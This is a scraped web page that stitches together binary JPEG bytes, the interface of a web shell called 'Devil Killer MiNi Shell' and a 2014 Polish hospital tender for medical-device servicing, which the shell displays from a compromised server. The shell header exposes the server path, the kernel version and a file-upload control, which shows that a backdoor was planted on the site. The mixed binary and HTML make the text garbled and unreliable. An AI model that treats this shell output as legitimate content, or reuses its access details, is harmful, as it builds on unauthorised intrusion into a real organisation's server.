JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140613/127767-N-2014.html

<p class="kh_header"><b>Wejherowo: ŚWIADCZENIE USŁUG SERWISOWYCH WYROBÓW MEDYCZNYCH (APARATURY 
I URZĄDZEŃ) W SZPITALU SPECJALISTYCZNYM IM. F. CEYNOWY SP. Z O.O. 
W WEJHEROWIE</b><br>
<b>Numer ogłoszenia: 127767 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. F. Ceynowy Sp. z o.o. , ul. dr A. Jagalskiego 10, 84-200 Wejherowo, woj. pomorskie, tel. 058 5727331, faks 058 5727331.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG SERWISOWYCH WYROBÓW MEDYCZNYCH (APARATURY 
I URZĄDZEŃ) W SZPITALU SPECJALISTYCZNYM IM. F. CEYNOWY SP. Z O.O. 
W WEJHEROWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług serwisowych polegających na wykonaniu przeglądów okresowych w tym konserwacji oraz napraw wyrobów medycznych (aparatury i urządzeń) w 28 zadaniach przez okres 24 miesięcy. 
2. Szczegółowe zestawienie wyrobów medycznych objętych zamówieniem opisano w załączniku nr 2 do SIWZ.
3. Zamawiający przewiduje szacunkową ilość roboczogodzin dla napraw dla poszczególnych zadań.:
Zadanie 1	- 25 h.
Zadanie 2	- 5 h.
Zadanie 3	- 12 h.
Zadanie 4	- 12 h.
Zadanie 5	- 15 h.
Zadanie 6	- 15 h.
Zadanie 7	- 27 h.
Zadanie 8	- 21 h.
Zadanie 9	- 9 h.
Zadanie 10	 - 5 h.
Zadanie 11	- 5 h.
Zadanie 12	- 9 h.
Zadanie 13	- 7 h.
Zadanie 14	 - 9 h.
Zadanie 15	 - 3 h.
Zadanie 16	 - 14 h.
Zadanie 17	 - 18 h.
Zadanie 18	 - 6 h.
Zadanie 19	 - 5 h.
Zadanie 20	 - 8 h.
Zadanie 21	 - 8 h.
Zadanie 22	 - 5 h.
Zadanie 23	 - 5 h.
Zadanie 24	 - 8 h.
Zadanie 25	 - 5 h.
Zadanie 26	 - 5 h.
Zadanie 27	 - 8 h.
Zadanie 28	 - 12 h.
Ilość szacowana jest ilością orientacyjną, określoną na podstawie dotychczasowych potrzeb. Ww ilości wykazane powyżej mają charakter poglądowy oraz pomocniczy do określenia ceny za 1 roboczogodzinę. W toku realizacji umowy o zamówienia publiczne ilości te mogą ulec zmianie, w granicach przedmiotu umowy.
CPV- 50400000-9 (Usługi w zakresie napraw i konserwacji urządzeń medycznych i precyzyjnych).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie należycie wykonali lub w przypadku świadczeń okresowych lub ciągłych należycie wykonują zamówienia tj. co najmniej 2 należycie wykonane lub wykonywane zamówienia na świadczenie usług serwisowych wyrobów medycznych (aparatury i urządzeń) polegających na wykonaniu przeglądów okresowych w tym konserwacji oraz napraw, każde zrealizowane w wartości nie mniejszej niż wartość brutto dla każdego zadania w określonym zakresie przedmiotowym w następującej minimalnej wysokości brutto:

Zadanie 1	25 000,00	w zakresie serwisu pomp infuzyjnych
Zadanie 2	7 000,00	w zakresie serwisu pomp infuzyjnych
Zadanie 3	7 000,00	w zakresie serwisu elektrokardiografów
Zadanie 4	9 000,00	w zakresie serwisu kardiomonitorów
Zadanie 5	8 000,00	w zakresie serwisu kardiomonitorów
Zadanie 6	9 000,00	w zakresie serwisu pulsoksymetrów
Zadanie 7	50 000,00	w zakresie serwisu urządzeń sterylizacyjnych
Zadanie 8	20 000,00	w zakresie serwisu urządzeń anestezjologicznych 
i neonatologicznych
Zadanie 9	5 000,00	w zakresie serwisu respiratorów
Zadanie 10	4 000,00	w zakresie serwisu respiratorów
Zadanie 11	4 000,00	w zakresie serwisu respiratorów
Zadanie 12	6 000,00	w zakresie serwisu respiratorów i aparatów do znieczulania
Zadanie 13	2 000,00	w zakresie serwisu stanowisk do pielęgnacji niemowląt
Zadanie 14	6 000,00	w zakresie serwisu kardiotokografów
Zadanie 15	1 000,00	w zakresie serwisu wanien
Zadanie 16	5 000,00	w zakresie serwisu urządzeń rehabilitacyjnych
Zadanie 17	3 000,00	w zakresie serwisu urządzeń laboratoryjnych
Zadanie 18	4 000,00	w zakresie serwisu aparatów do badania słuchu, audiometrów 
i tympanometrów
Zadanie 19	4 000,00	w zakresie serwisu respiratorów
Zadanie 20	5 000,00	w zakresie serwisu aparatów do elektrochirurgii
Zadanie 21	6 000,00	w zakresie serwisu aparatów do elektrochirurgii
Zadanie 22	3 000,00	w zakresie serwisu rejestratorów holter
Zadanie 23	2 000,00	w zakresie serwisu rejestratorów holter
Zadanie 24	500,00	w zakresie serwisu stacji uzdatniania wody
Zadanie 25	3 000,00	w zakresie serwisu echokardiografów
Zadanie 26	2 000,00	w zakresie serwisu ultrasonografów
Zadanie 27	19 000,00	w zakresie serwisu urządzeń okulistycznych
Zadanie 28	6 000,00	w zakresie serwisu urządzeń histopatologicznych
W przypadku jeśli Wykonawca składa ofertę na kilka zadań, Wykonawca jest zobowiązany potwierdzić spełnienie warunku udziału w postępowaniu dla każdego zadania odrębnie poprzez złożenie Załącznika nr 7 do każdego zadania odrębnie. W przypadku jeśli Wykonawca złoży ofertę do kilku zadań obejmujących ten sam rodzaj urządzeń, Zamawiający dopuszcza złożenie jednego wykazu (załącznik nr 7 do SIWZ) dla tożsamych przedmiotowo zadań i wspólnych dokumentów potwierdzających należyte wykonanie lub wykonywanie zamówienia pod warunkiem, iż wartość każdego wykazanego zamówienia brutto będzie nie mniejsza niż suma kwot dla tych zadań określona w rozdz. 5 pkt. 1.1 b (rozdział 5 pkt. 1.1 b SIWZ). Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych dokumentów i oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą brać udział Wykonawcy, którzy dysponują co najmniej 2 osobami, które będą uczestniczyły w realizacji zamówienia z doświadczeniem co najmniej 1 roku świadczenia usług w zakresie usług serwisowych wyrobów medycznych (aparatury i urządzeń) polegających na wykonaniu przeglądów okresowych w tym konserwacji i  napraw oraz z wykształceniem co najmniej średnim technicznym każda z tych osób (rozdział 5 pkt. 1.1 c SIWZ). Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych dokumentów i oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnego warunku w tym zakresie. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych w ofercie wymaganych oświadczeń na zasadzie spełnia - nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych wykonywanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie tj. co najmniej 2 główne zamówienia, przez które należy rozumieć co najmniej 2 należycie wykonane lub wykonywane zamówienia na świadczenie usług serwisowych wyrobów medycznych (aparatury i urządzeń) polegających na wykonaniu przeglądów okresowych w tym konserwacji oraz napraw, każde zrealizowane w wartości nie mniejszej niż wartość brutto dla każdego zadania w określonym zakresie przedmiotowym w następującej minimalnej wysokości brutto:
Zadanie 1	25 000,00  - w zakresie serwisu pomp infuzyjnych
Zadanie 2	7 000,00 - w zakresie serwisu pomp infuzyjnych
Zadanie 3	7 000,00 - w zakresie serwisu elektrokardiografów
Zadanie 4	9 000,00 - w zakresie serwisu kardiomonitorów
Zadanie 5	8 000,00 - w zakresie serwisu kardiomonitorów
Zadanie 6	9 000,00 - w zakresie serwisu pulsoksymetrów
Zadanie 7	50 000,00 - w zakresie serwisu urządzeń sterylizacyjnych
Zadanie 8	20 000,00 - w zakresie serwisu urządzeń anestezjologicznych i neonatologicznych
Zadanie 9	5 000,00 - w zakresie serwisu respiratorów
Zadanie 10	4 000,00 - w zakresie serwisu respiratorów
Zadanie 11	4 000,00 - w zakresie serwisu respiratorów
Zadanie 12	6 000,00 - w zakresie serwisu respiratorów i aparatów do znieczulania
Zadanie 13	2 000,00 - w zakresie serwisu stanowisk do pielęgnacji niemowląt
Zadanie 14	6 000,00 - w zakresie serwisu kardiotokografów
Zadanie 15	1 000,00 - w zakresie serwisu wanien
Zadanie 16	5 000,00 - w zakresie serwisu urządzeń rehabilitacyjnych
Zadanie 17	3 000,00 - w zakresie serwisu urządzeń laboratoryjnych
Zadanie 18	4 000,00 - w zakresie serwisu aparatów do badania słuchu, audiometrów i tympanometrów
Zadanie 19	4 000,00 - w zakresie serwisu respiratorów
Zadanie 20	5 000,00 - w zakresie serwisu aparatów do elektrochirurgii
Zadanie 21	6 000,00 - w zakresie serwisu aparatów do elektrochirurgii
Zadanie 22	3 000,00 - w zakresie serwisu rejestratorów holter
Zadanie 23	2 000,00 - w zakresie serwisu rejestratorów holter
Zadanie 24	 500,00 - w zakresie serwisu stacji uzdatniania wody
Zadanie 25	3 000,00 - w zakresie serwisu echokardiografów
Zadanie 26	2 000,00 - w zakresie serwisu ultrasonografów
Zadanie 27	19 000,00 - w zakresie serwisu urządzeń okulistycznych
Zadanie 28	6 000,00 - w zakresie serwisu urządzeń histopatologicznych
W przypadku jeśli Wykonawca składa ofertę na kilka zadań, Wykonawca jest zobowiązany potwierdzić spełnienie warunku udziału w postępowaniu dla każdego zadania odrębnie poprzez złożenie Załącznika nr 7 do każdego zadania odrębnie.  - załącznik nr 7 do SIWZ. W przypadku jeśli Wykonawca złoży ofertę do kilku zadań obejmujących ten sam rodzaj urządzeń, Zamawiający dopuszcza złożenie jednego wykazu (załącznik nr 7 do SIWZ) dla tożsamych przedmiotowo zadań i wspólnych dokumentów potwierdzających należyte wykonanie lub wykonywanie zamówienia pod warunkiem, iż wartość każdego wykazanego zamówienia brutto będzie nie mniejsza niż suma kwot dla tych zadań określona w rozdz. 5 pkt. 1.1 b;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Szczegółowy wykaz składowych wymaganego zestawu przeglądowego (załącznik nr 3 do SIWZ) dla następujących zadań i pozycji:
Zadanie nr 7 poz. 1,2
Zadanie nr 8 poz. 3,4,5,6,7
Zadanie nr 9 poz. 1,3
Zadanie nr 10 poz. 1,2,3
Zadanie nr 11 poz. 1,2,3
Zadanie nr 12 poz. 4,5
Zadanie nr 19 poz. 1.
2. Oświadczenie - załącznik nr 9 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie (w oryginale lub w postaci kopii poświadczonej notarialnie) do podpisania oferty,
jeśli upoważnienie do reprezentacji Wykonawcy przez osobę podpisującą ofertę nie wynika bezpośrednio z dokumentów, o których mowa w pkt. 3 nn. rozdziału.
2. Wypełniony formularz oferty - załącznik nr 1 do SIWZ.
3. Wypełniony formularz cenowy - załącznik nr 2 do SIWZ.
4. Oświadczenie o prawdziwości złożonych oświadczeń - załącznik nr 4 do SIWZ.
5. Zgodnie z art. 26 ust. 2 b ustawy Prawo Zamówień Publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Pisemne zobowiązanie podmiotów udostępniających Wykonawcy swoje zasoby musi zawierać jednoznaczne zobowiązanie tych podmiotów do udostępnienia Wykonawcy zasobów na czas realizacji nn. zamówienia w celu realizacji umowy nr SZP/ZP/N/DA/30/2014 dla Szpitala Specjalistycznego im. F. Ceynowy Sp. z o.o. z siedzibą w Wejherowie, podpisane przez upoważnione do reprezentowania tych podmiotów osoby.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie pisemnymi aneksami podpisanymi przez strony, pod rygorem nieważności, chyba, że w umowie określono inaczej.
2. Strony przewidują, możliwość przedłużenia okresu obowiązywania umowy pisemnym aneksem bez zwiększenia wartości przedmiotu umowy, w przypadku niezrealizowania umowy w całości w okresie o którym mowa w §10 ust. 5 umowy. 
3. Zmiana cen jednostkowych będzie dopuszczona w przypadku zmiany /obniżenia lub podwyższenia/ stawek podatkowych dla przedmiotu zamówienia o wyrażoną w złotych różnicę pomiędzy stawką podatku VAT dotychczasową a nową i wówczas zmianie ulegać będzie tylko cena brutto. Zmiana ceny w tym przypadku będzie następowała z chwilą wejścia w życie nowych przepisów bez konieczności podpisywania aneksów. Zastosowanie ma §8 ust. 2 umowy.
4. Dopuszcza się inne zmiany treści umowy pod warunkiem, iż są one korzystne dla Zamawiającego.
5. Zamawiający dla usług określonych w §1 ust. 3b dla zadania X przewiduje szacunkową ilość roboczogodzin w ilości X h /*zgodnie z zapisem rozdz. 3 pkt 2 SIWZ/ w okresie obowiązywania umowy. Ilości te mają charakter szacunkowy określony na podstawie dotychczasowych potrzeb Zamawiającego i mogą ulec zmniejszeniu lub zwiększeniu w granicach przedmiotu umowy w zależności od aktualnych potrzeb Zamawiającego w zakresie wykonania usług, o których mowa w §1 ust. 3b. Zmiana ilości roboczogodzin nie wymaga aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny im. F. Ceynowy Sp. z o.o.
ul. Jagalskiego 10
84-200 Wejherowo
Dział Zamówień Publicznych
lokal nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 08:30, miejsce: Siedziba Zamawiającego (ul. Jagalskiego 10 84-200 Wejherowo) - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE POMP INFUZYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE POMP INFUZYJNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE POMP INFUZYJNYCH.</p>
